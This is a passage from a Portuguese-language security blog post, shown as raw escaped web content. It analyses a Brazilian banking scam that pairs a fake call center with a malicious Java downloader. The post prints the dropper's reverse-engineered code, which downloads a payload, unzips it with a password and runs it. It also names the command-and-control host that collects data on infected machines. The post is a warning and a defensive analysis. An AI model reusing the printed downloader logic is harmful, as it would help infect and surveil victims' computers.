![\"AppItau001\"](\"http:\/\/www.batori.com.br\/blog\/wp-content\/uploads\/2016\/10\/Captura-de-Tela-2016-11-06-a\u0300s-15.35.43.png\")
<\/a>Tela de instala\u00e7\u00e3o do aplicativo<\/p><\/div>\n
Considerando a\u00a0Engenharia Social esta segunda liga\u00e7\u00e3o ocorre pelo fato da v\u00edtima j\u00e1 estar esperando e ciente do fato,\u00a0como ela foi bem tratada na primeira, ela tende a confiar mais nas informa\u00e7\u00f5es da segunda liga\u00e7\u00e3o, a falsa funcion\u00e1ria utilizou o nome de uma artista conhecida para que ocorra mais um ganho de confian\u00e7a e de forma impl\u00edcita.<\/p>\n
Ao acessar o endere\u00e7o, a p\u00e1gina falsa baixa o arquivo Aplicativo.jar que \u00e9\u00a0um programa desenvolvido na linguagem java. Atrav\u00e9s do uso de engenharia reversa, foi poss\u00edvel identificar que o programa, se executado, iria baixar mais um arquivo compactado e protegido pela senha “102030”, conforme o c\u00f3digo abaixo:<\/p>\n
private static void executa(String URL, String local, String nome) {\r\n try { downloadFile(URL, local + \"\\\\\" + nome);\r\n \r\n zip.UnZip(local + \"\\\\\" + nome, local, \"102030\");\r\n File FileTemp = new File(local + \"\\\\\" + nome);\r\n FileTemp.delete();\r\n \r\n Runtime.getRuntime().exec(\"cmd \/c \\\"\" + local + \"\\\\aplicativo.exe\\\"\");\r\n }\r\n catch (Exception localException) {}\r\n}<\/pre>\nTodo este processo realizado pelo malware foi desenvolvimento para dificultar a identifica\u00e7\u00e3o do malware pelo software de antiv\u00edrus. Os softwares de\u00a0antiv\u00edrus n\u00e3o conseguem abrir um arquivo protegido por senha para fazer uma an\u00e1lise mais completa do artefato.<\/p>\n
Analisando o arquivo aplicativo.exe foi identificado que sua fun\u00e7\u00e3o principal \u00e9 abrir portas para\u00a0conex\u00e3o externa no computador da v\u00edtima e enviar as informa\u00e7\u00f5es sobre o nome do usu\u00e1rio, nome do computador e as portas abertas para o endere\u00e7o www.brtcontrol.com que registra todas as informa\u00e7\u00f5es e cria\u00a0um banco de dados de computadores infectados.<\/p>\n
Possivelmente este Malware foi criado pela ferramenta SET (Social Engineering Toolkit).<\/p>\n
Este golpe \u00e9 particularmente perigoso, porque conta, al\u00e9m do uso de um software malicioso (malware), uma falsa central de atendimento proporcionando um contato humano para enganar as v\u00edtimas.<\/p>\n
Marcos Fl\u00e1vio Eli Pereira, pesquisador e estudante de seguran\u00e7a da informa\u00e7\u00e3o da Fatec de Americana, recomenda que qualquer acesso aos sites de bancos deve ser realizado somente atrav\u00e9s de computadores confi\u00e1veis, atualizados e protegidos por antiv\u00edrus e firewall. E o mais importante, que sempre seja conferido a autenticidade do site aberto no navegador atrav\u00e9s da verifica\u00e7\u00e3o do certificado digital do site do Banco.<\/p>\n","protected":false},"excerpt":{"rendered":"
Al\u00e9m de um malware, um golpe virtual est\u00e1 sendo aplicado atrav\u00e9s de uma central de atendimento ativa falsa. Centrais de atendimento ativas normalmente ligam para os clientes para oferecer produtos, para fazer cobran\u00e7as ou para resolver eventuais problemas dos clientes. … Continue lendo